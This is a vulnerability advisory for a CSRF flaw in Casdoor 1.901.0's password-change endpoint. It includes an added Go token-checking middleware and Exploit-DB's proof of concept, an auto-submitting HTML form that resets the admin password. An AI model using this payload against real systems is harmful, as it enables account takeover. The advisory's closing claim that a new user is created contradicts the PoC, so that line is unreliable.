Vendor: Casdoor
By: Van Lam Nguyen
CVSS: 4.1 (MEDIUM)
CWE: 352, Cross-Site Request Forgery (CSRF)
Product Name: Casdoor
Affected Version From: 1.901.0
Affected Version To: 1.901.0
Patch Exists: NO
CPE: casdoor
Platforms Tested: Windows
2024

Casdoor 1.901.0 – Cross-Site Request Forgery (CSRF)

Casdoor version 1.901.0 and below has a Cross-Site Request Forgery (CSRF) vulnerability in the /api/set-password endpoint. This vulnerability allows attackers to change a victim user's password through a maliciously crafted URL.

Mitigation:

To mitigate this vulnerability, it is recommended to implement anti-CSRF tokens in the application to validate and authenticate requests, ensuring that actions are performed by the intended user.
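
One way to implement the token check recommended above, as an added example (not Casdoor's code and not part of the original advisory): a Go net/http middleware that refuses a POST to /api/set-password unless it carries a same-origin Origin header and a token bound to the caller's session. The trusted origin, the `session` cookie name, the `X-CSRF-Token` header, the key and the session ID are assumptions made for this example.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Assumed for this example: the origin, the "session" cookie, the X-CSRF-Token header, the key.
const trustedOrigin = "http://localhost:8000"
var csrfKey = []byte("constructed-demo-key") // a real deployment loads a random secret

// tokenFor derives the anti-CSRF token from the session ID, so it is useless in another session.
func tokenFor(sessionID string) string {
	m := hmac.New(sha256.New, csrfKey)
	m.Write([]byte(sessionID))
	return hex.EncodeToString(m.Sum(nil))
}

// csrfGuard: the session cookie alone is not enough for a POST; Origin and token must match too.
func csrfGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		c, err := r.Cookie("session")
		if r.Method == http.MethodPost && (err != nil || r.Header.Get("Origin") != trustedOrigin ||
			!hmac.Equal([]byte(r.Header.Get("X-CSRF-Token")), []byte(tokenFor(c.Value)))) {
			http.Error(w, "CSRF check failed", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// send replays a POST to /api/set-password (constructed form body) through the guard.
func send(origin, token string) int {
	ok := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
	r := httptest.NewRequest("POST", "/api/set-password", strings.NewReader("userOwner=built-in&userName=admin&newPassword=example"))
	r.AddCookie(&http.Cookie{Name: "session", Value: "sess-123"}) // the browser attaches this cross-site
	r.Header.Set("Origin", origin)
	r.Header.Set("X-CSRF-Token", token)
	w := httptest.NewRecorder()
	csrfGuard(ok).ServeHTTP(w, r)
	return w.Code
}

func main() { fmt.Println(send("http://other-site.example", ""), send(trustedOrigin, tokenFor("sess-123"))) } // 403 200
```

An HTML form cannot set a custom request header, so a cross-site form submission reaches the guard with the victim's cookie but without the token and is rejected.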

Exploit-DB raw data:

# Exploit Title: Casdoor 1.901.0 - Cross-Site Request Forgery (CSRF)
# Application: Casdoor
# Version: 1.901.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen 
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip
# Tested on: Windows
# CVE : N/A

Overview
==================================================
Casdoor v1.901.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. 
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.

Proof of Concept
==================================================

Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step

<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>

</html>

If a user is logged into the Casdoor web app at the time of execution, a new user will be created in the app with the following credentials:

userOwner: built-in
userName: admin
newPassword: hacked